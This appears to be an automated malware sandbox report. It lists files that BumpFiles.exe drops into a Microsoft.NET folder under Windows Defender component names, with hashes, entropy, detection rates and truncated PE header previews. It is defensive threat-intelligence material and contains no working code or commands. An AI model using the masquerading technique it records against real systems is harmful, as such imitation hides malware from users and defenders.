SHA-512:	410C487FCFF08C7052BFF30EB1CCE78DA4EDD1B3584F2A58173CA7A9B682F6BB528CFD0736F658D061F951326B609A178DD2F8C25016957EEF15A398471B34DA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n)..H.TH.TH.T.=.U+H.T.:.U9H.TH.T.I.T.:.U9H.T.:.U.H.T.:.U.H.T.:XT(H.T.=.U+H.T.=.U.H.T.=ZT+H.T.=.U+H.TRich*H.T................PE..d.... ............" .....`... .................f.....................................s....`A.........................................r.......r.......P.......P..8........%...`...,...{..p.......................(.......8............................................text...hP.......`.................. ..`.rdata.......p... ...p..............@..@.data..............................@....pdata..8....P.......@..............@..@.rsrc........P.......@..............@..@.reloc...,...`...0...P..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpClient.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	6.332720664448543
Encrypted:	false
SSDEEP:	6144:WYtMdcvXGRDeyNF203FDpUaXCtohlikEt2U:WYtIRDflDpYos
MD5:	5C7736509CF1CC99D06D2F9ADA099A75
SHA1:	52C58A9C7CC5C0A52327F0F84B43E3984AA54135
SHA-256:	4B8D7E016AC84D73D5747CC84847F4CC0583B185FE636E3CCD3E1F713650425D
SHA-512:	539232DC40158ADA718E090A732D62FF574C1259D6F8C812911E49BD1DFCE8E406455F7160D39335893EF6C77DC3F29ABA7F0AFA75CE2E2E767C02563D347158
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._9.n1j.n1j.n1j..2k.n1j..5k.n1j..4k.n1j..5k.n1j..2k.n1j..4k.n1j..0k.n1j.n0j.n1j..8k.n1j..1k.n1j...j.n1j..3k.n1jRich.n1j........PE..d...E..e.........." ... ............L.....................................................`......................................... 1...=..$n..................$'..............h.......p...........................@...@............................................text...L........................... ..`.rdata...z.......\|..................@..@.data....*...........h..............@....pdata..$'.......(...\|..............@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26721983
Entropy (8bit):	1.4876745712622361
Encrypted:	false
SSDEEP:	49152:XeQVBh0T2P8dpyCmvMXhWDyrNNmFfSewJep3V7XoJ//lKkTjyVcg:OQVVkmvahxhd1XyVc
MD5:	0F0AC6E9ABA9C88702921DB11C4B2EB8
SHA1:	9FEBA58C87C1C717918E183DF99172AF0E1118BE
SHA-256:	07A244E97090B0159C703F870D8F1B54EC3237E517118FB0318DDE982CEF2787
SHA-512:	4DDB7459752930A46174B6F460F49F40C70217FF5748C4EDB7D6D3E8F53478D2C487D1F1D575581DE42911210FA167E2A33719B3A9D5A71CE6A8124101F158E6
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......e.........." .....2<..........a;.......@..............................`J...................................... ................B.......B..T....I...... F.XS............C......................................................B.......B......................text....1<......2<................. ..`.data...x\...P<..^...6<.............@....bss....P.....A..........................idata...T....B..V....A.............@....didata.......B.......A.............@....edata........B.......A.............@..@.rdata..D.....C.......A.............@..@.reloc........C.......A.............@..B.pdata..XS... F..T....E.............@..@.rsrc.........I......TH.............@..@.............`J......*I.............@..@........................................

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	925848
Entropy (8bit):	6.085579436536139
Encrypted:	false
SSDEEP:	12288:kI8/UlbzMwl5E5tbcklE1WcHTWYmj8rzm/xsdO/05e7+ew7l:kIkwMPEgcHS/j8ruxsdO2FJ
MD5:	4F2C9892C74315AD23E03A84FC3C15CD
SHA1:	8F1B56DE4487610611442B91052B165AC25ACDF8
SHA-256:	09C6A18F0DEF6FB156DFF6F8EF3EAC3F27A23BE141338E21EADDA093B84AB0F2
SHA-512:	B245243360C900AAA7A47CC3AC06BF56617A9C5BBB83F9BE62C547E6A4C97DF23E677F9A7B0CADC21D3D1F82E24738D54BE1604E77F453F6FC9A4CE46B811431
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;c..Z...Z...Z..a/...Z..a/...Z..=(...Z..=(...Z..."...Z..=(...Z..=(...Z...Z...X..a/..RZ...s..Z..a/..Z..a/...Z..Rich.Z..................PE..d....P.j.........."......p...p.......b.........@..................................................... ......................................0....................T.......@......l.......p.......................(.......8..................X... ....................text....l.......p.................. ..`.rdata..n...........................@..@.data....R...@...P...@..............@....pdata...T.......`..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCommu.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	353552
Entropy (8bit):	6.063609490596869
Encrypted:	false
SSDEEP:	6144:tdIqN/NLP6m0KBU19MCIOD6zhhsP1nhUOqM:wi/OXGhYrqM
MD5:	5C77DC919514E716498065E898A24030
SHA1:	2EF9CFF55BE5F8DF08CDD735773130EDBF6FF071
SHA-256:	69BBFE4113FAD42B74A4039EDAC0C8BEA7C558DD22C1D7A284163EFC190FDC95
SHA-512:	06D9C9AF52411DAAE72DDD9628A867F15E24F856507A54D3E3B6CDE7775BE6CB0663CF78CAD82CE1E4AC5542CE2EF4CAB88A4D770A3BEA774780543E8A6825C4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M......................................................o.........Q......%...............R...................Rich....................PE..d...c............." ...........................f.............................P.......P....`A................................................p........0..........\|,...@...%...@..........p...................(...(......8...........P................................text............................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata..\|,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc.......@.......0..............@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165560
Entropy (8bit):	5.404976368456962
Encrypted:	false
SSDEEP:	1536:UMrr7HamDZjuGzV+J0fG9uKPxONFKTeWvOCzAt1di5ku1RQpy55Pxx:NKiZyGzEKoANFKTeAzAD85ku1S85r
MD5:	BF16294ABC456381F5F8C8BA7CA68933
SHA1:	762B74924FAACA7CE2DFA1DA78E5076D4FF7CF62
SHA-256:	1241F24AC9C5A111F21C5CEF831A5881A5C06229E09D158CBF2AC54E41C4E1C9
SHA-512:	3110E14522BE93B5C9B6193B29B36553A3CE81192BFC33DEA0617768873A8F23BA33260FECE074E38BF82723EEE246F1000BE61A9FDCF8A5C0A09FF08C9F47CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.B.X...X...X..q-...X..q-...X..-...X..-...X... t..X..-...X..-...X...X...Y..q-...X..q-...X..q-...X..Rich.X..................PE..d.....h..........."..........P.................@.............................`......FZ............... .......................................Z..................`....`...&...P..4....9..p.......................(.......8...........8................................text...e........................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..`...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDetours.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165136
Entropy (8bit):	5.919968753776253
Encrypted:	false
SSDEEP:	3072:SbKF9Ch4oIM5qO2j+1L4BitdPhPIBcV0YnoC4PlS/KB8cV2j6jaV4:S+nCZIM1Ld7hgjWoXYcV7z
MD5:	F05E8D6365BF5A5218071548F5E687A0
SHA1:	B132FE303519E4BE50A547D6A6FE8AF359C8D335
SHA-256:	657A136378B351C50C2D60D425210021C8FE0BB9E8B998320163CC09339899AC
SHA-512:	B09B0FE1693F2B726B56CE745EF949CDE3A0D2412D763F3F84FEBAD3C4D28A0FDB6ED40CA55EFB0D8AEB5EF410402F42229F06583EC9B1572D477029141B7FFF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..............~....o....s....x..v.z.p.....L....V.....~.....6......~.....~..Rich...........................PE..d......0.........." .........................................................p......&.....`A.........................................................P.......0.......`...%...`......@...p.......................(...`...8............................................text...Bw.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103672
Entropy (8bit):	5.463582216147117
Encrypted:	false
SSDEEP:	1536:9QyB1n0kg+iFMx3/TOw987XxhLTdCfDQl/0agrW7mPfp5PRnNazo:pn0k8FM5/TOw27XTdCfDW8nNPfp5pNa8
MD5:	5B57B2C8291FE382F8F87E91A19B5BB9
SHA1:	0B4224F7DA53BF49A1A822DA111464B185657A8A
SHA-256:	48732B6B8C62DAEA68F2C38EEDEEA59DA2F142403AF9EE0D8D77181BDD22BBD1
SHA-512:	4E2012B7C19319A97F4AAA7C94DD7427C850B30EAD8E679F8140AF60724AEACDFA943BA9501D456F66DB08E2325772B90F2F8E5502AB63909F5F4BED97FEC8BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.f.>...>...>.....?......4......2......9...7...1...>...0............?...........?.....?...Rich>...........PE..d...R.L..........." .................^....................................................`A........................................0...H...x........`..`....P.......p...$...p..........p...................h...(...0...8...............0............................text............................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...`....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	373224
Entropy (8bit):	5.820010710818714
Encrypted:	false
SSDEEP:	6144:zbkK5UHrNrsedr+z0nsqBmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60R:eNgGr+Wjl
MD5:	9CA81B59C17591C8B09AF4D753A28020
SHA1:	95D7494686DFA1701FEF297944EBA28B06380931
SHA-256:	98EFF3DF7B16B9743B4F5A89F163406946E8C42229DEFCEB77E26BB5B2FF307A
SHA-512:	C782A8C01B12CBCDB77D49224D04D386E0EC68F66789C9970370CC68BDD0270ADAE8D3DE52AFF821189BC1BA96231FA283489854E3AF7D67ADEB4BDE3FA52D8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..cP...%..cP...%..?W...%..?W...%...]...%..?W...%..?Wn..%..?W...%...%...$..cP...%..cPl..%..cP...%..Rich.%..........................PE..d....3\|s.........."..................9.........@.....................................}............... ......................................4...@....p.......P..H........1......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..H....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144728
Entropy (8bit):	3.894814306787259
Encrypted:	false
SSDEEP:	768:w81RWuK37OeBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXRrL1PemM9t:wssBkG2usKfPeFz
MD5:	E49B09EAC7BD3C5B71B0F33E72A2CF34
SHA1:	61F5B81BF0C81090098806B2EF3C8EF895504AD9
SHA-256:	E9C233A28F49690339710143FDC146FAA9B73E89A8D828CC026F7246C5CED71E
SHA-512:	2E75983DD7FE9FFB73A5CCE89A6A0C19489A4ADBAC0D6B68AB53B08CF12D3D9BE7FC139E8C7B9CCD37FF07B5B24E7D9CAEDAFACFCBE3CC3351C504AA8AE564A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......................................................................`.......................................................... ..................X%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpOAV.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	496912
Entropy (8bit):	6.014056505362478
Encrypted:	false
SSDEEP:	6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
MD5:	82D45EE8BCA40389EA79879C75EC6207
SHA1:	86108949630649367EA91153EEE86F2FDC9F2489
SHA-256:	CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
SHA-512:	8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EA.G. ... ... ...U... ...R... ... ..-!...R... ...R... ...R... ...U... ...U..M ...U/.. ...U... ..Rich. ..................PE..d..............." ..........................._....................................\|.....`A................................................D...x............`...#...p...%......t.......p....................8..(...P7..8............8..p............................text...2........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpProvider.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	202072
Entropy (8bit):	5.957890458465426
Encrypted:	false
SSDEEP:	3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
MD5:	4987F9EFD8B2E414801BB322400D2BFD
SHA1:	A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
SHA-256:	08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
SHA-512:	FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.:...i...i...i.r.h...i.r.h...i...i#..i.r.h...i.r.h...i.r.h...i.r.h...i.rAi...i.r.h...iRich...i........................PE..d...-.T..........." ......... ......@.....................................................`A.........................................u......Hv..,.......@...............X%......p....+..p.......................(.......@...........(................................text...l........................... ..`.rdata..&...........................@..@.data... ...........................@....pdata........... ..................@..@.rsrc...@...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpRtp.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1619192
Entropy (8bit):	6.3400930707756755
Encrypted:	false
SSDEEP:	24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
MD5:	59CD6F03A00980D8ADBF42EFBB9FFFD8
SHA1:	F5471A156DDDC69799782E3FE0D72FD6E8D0F085
SHA-256:	A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
SHA-512:	49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P(c..I...I...I..<...I..<...I...;...I...I...H...;...I...;..=I...;...I...;...I..<...I..<...I..<...I..<...I..Rich.I..................PE..d....(~..........." .................3.........^..........................................`A........................................@............... ..hg...`..,........$..............p...................P\|..(....G..8...........x\|..........@....................text............................... ..`.rdata..>.... ....... ..............@..@.data....v.......`..................@....pdata..,....`.......@..............@..@.didat..x...........................@....rsrc...hg... ...p..................@..@.reloc........... ...p..............@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpSvc.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3282192
Entropy (8bit):	6.315630312982859
Encrypted:	false
SSDEEP:	98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
MD5:	3767B51F5D134FD6A459F2F30C87ED14
SHA1:	33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
SHA-256:	203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
SHA-512:	7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......U.....zE..zE..zE..{D..zE..yD..zE..{D..zE..~D..zE..yD..zE...E..zE..{EL.zE...D!.zE..E..zE..zD..zE..sDe.zE6y.E..zE..E..zE..xD..zERich..zE........................PE..d.....;..........." ......$....................\.............................02.......2...`A...........................................d...T...\|....`1.......0.<D....1..%....1.\6...r*.p.....................%.(.....$.8...........@.%..............................text...nu$.......$................. ..`.rdata...X....$..`....$.............@..@.data...............................@....pdata..<D....0..P..../.............@..@.didat.......P1.......1.............@....rsrc........`1...... 1.............@..@.reloc..\6....1..@....1.............@..B........................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107880
Entropy (8bit):	5.399183517403788
Encrypted:	false
SSDEEP:	3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
MD5:	5020E4A4321476F7DE557F75CBC87438
SHA1:	6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
SHA-256:	41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
SHA-512:	7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ql>}..P...P...P..u....P.^uS/..P.^uT/..P...Q...P.^uQ/..P.^uU/..P.^uP/..P.^uX/:.P.^u....P.^uR/..P.Rich..P.........................PE..d................." ...........................e....................................3.....`A................................................4........P.......@..d.......h%...p......0...p.......................(.......@............................................text............................... ..`.rdata...e.......p..................@..@.data...@.... ... ... ..............@....pdata..d....@.......@..............@..@.rsrc........P... ...P..............@..@.reloc.......p.......p..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128376
Entropy (8bit):	5.778415627793409
Encrypted:	false
SSDEEP:	3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
MD5:	2C2714BAB4E11FD6865DDF8B501A212D
SHA1:	9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
SHA-256:	0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
SHA-512:	73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]P...P...P......Q.......].......W...Y.B.@...............]...P...d.............Q......Q...RichP...................PE..d...../..........."............................@............................................................................................tj.......... ...............x%......`....<..p....................$..(...."..8...........@$...............................text...R........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata........... ..................@..@.rsrc... ...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21776
Entropy (8bit):	4.731417909543677
Encrypted:	false
SSDEEP:	192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
MD5:	0613DECA278E353EBC96493895754CCE
SHA1:	D72682AE6E077DE106235D9C236B2C7F744E2DBC
SHA-256:	D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
SHA-512:	275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d...a.n..........." ......... ...............................................0...........`A......................................................... ...............0...%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21856
Entropy (8bit):	4.482734780628967
Encrypted:	false
SSDEEP:	192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
MD5:	9EEE260CF0F752D4595E51AF7EBD8B6A
SHA1:	1544C414D1240AC4F8FED45551EA061CD4665721
SHA-256:	49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
SHA-512:	27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......... ...............................................0......7.....`.......................................................... .. ............0..`%..............T............................................................................rdata..............................@..@.rsrc... .... ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\NisSrv.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2909208
Entropy (8bit):	6.442167136448819
Encrypted:	false
SSDEEP:	49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
MD5:	852AAE2F9F2F13FD6AECC1E1817D8BF1
SHA1:	548C65353A1A7ACFA4CCF72F94571FEEB533AB44
SHA-256:	6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
SHA-512:	3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C\|......C\|.......{.......{.......{.......q;..............{.......{U.............C\|..i...C\|W.....C\|......Rich............................PE..d....v............".......#..........."........@..............................-.......-...`..................................................X).,.....,.H....@+.dU....+.......,..1..0.%.p....................$.(.....$.8.............$.@....N)......................text.....#.......#................. ..`.rdata...{....$.......$.............@..@.data...p.....).......).............@....pdata..dU...@+..`... *.............@..@.didat........,.......+.............@....rsrc...H.....,.......+.............@..@.reloc...1....,..@....+.............@..B................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	738576
Entropy (8bit):	6.022878886310737
Encrypted:	false
SSDEEP:	12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
MD5:	CFC96445CC630E00935A8A74875BD45C
SHA1:	5572055932156EA9F569ACB1CFC0E714373765D6
SHA-256:	D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
SHA-512:	92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)m.m...m...m....y..l....y..o...~..\|...m.......~..w...~..c...~......y..l....y.......yG.l....y..l...Richm...................PE..d......+.........." .....p..................................................@............`A............................................................X....p..(P... ...%......,H..<...p.......................(.......8...................D........................text....d.......p.................. ..`.rdata...S.......`..................@..@.data...D........p..................@....pdata..(P...p...`...P..............@..@.didat..............................@....rsrc...X...........................@..@.reloc..,H.......P..................@..B........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
Category:	dropped
Size (bytes):	94958
Entropy (8bit):	3.592146871128743
Encrypted:	false
SSDEEP:	768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
MD5:	4B23206905E11134BEB571548C245F3C
SHA1:	3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
SHA-256:	2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
SHA-512:	9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
Malicious:	false
